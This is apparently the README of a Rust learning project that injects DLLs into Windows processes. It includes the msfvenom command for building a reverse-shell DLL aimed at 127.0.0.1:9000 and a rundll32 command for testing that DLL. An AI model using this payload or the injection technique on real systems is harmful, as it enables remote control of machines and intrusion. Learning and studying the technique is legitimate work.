# Process DLL injector
Learning how DLL injection in a process on Windows works, in Rust. Based on https://gamehacking.academy/lesson/7/1 and https://github.com/trickster0/OffensiveRust/blob/master/Process_Injection_CreateRemoteThread/src/main.rs.

## Bitness
To inject in a 32b process, compile this project for x86:
```sh
rustup toolchain add stable-i686-pc-windows-msvc
cargo +stable-i686-pc-windows-msvc build --release
```

TODO: this could probably be handled in code.

## DLL
Example DLL is included in `./assets/reverse_shell.dll`. It opens a reverse shell to `127.0.0.1:9000` and was generated using following command:
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=9000 -f dll -o reverse_shell.dll
```

Ensure the DLL works with: `rundll32.exe ./assets/reverse_shell.dll,entry`